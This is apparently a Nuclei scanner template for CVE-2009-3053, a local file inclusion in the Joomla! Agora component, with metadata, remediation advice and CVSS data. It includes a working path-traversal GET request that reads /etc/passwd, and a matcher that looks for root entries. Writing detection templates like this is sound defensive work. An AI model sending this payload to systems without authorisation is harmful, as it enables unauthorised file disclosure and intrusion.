45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
id: CVE-2009-3053
|
|
|
|
info:
|
|
name: Joomla! Agora 3.0.0b - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
|
|
remediation: |
|
|
Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/9564
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-3053
|
|
- http://www.exploit-db.com/exploits/9564
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
|
cvss-score: 6.8
|
|
cve-id: CVE-2009-3053
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00367
|
|
epss-percentile: 0.6946
|
|
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: joomla
|
|
product: joomla
|
|
tags: cve,cve2009,joomla,lfi,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a004830460221009aff6f22bcbf03c5602f2c59a89a34f36c7b0ffde86a674edc90c2b1675fa139022100cb69b326fa55ef2ba793c650987b6e3671d72d001bdb9b5778358fb3cd301005:922c64590222798bb761d5b6d8e72950
|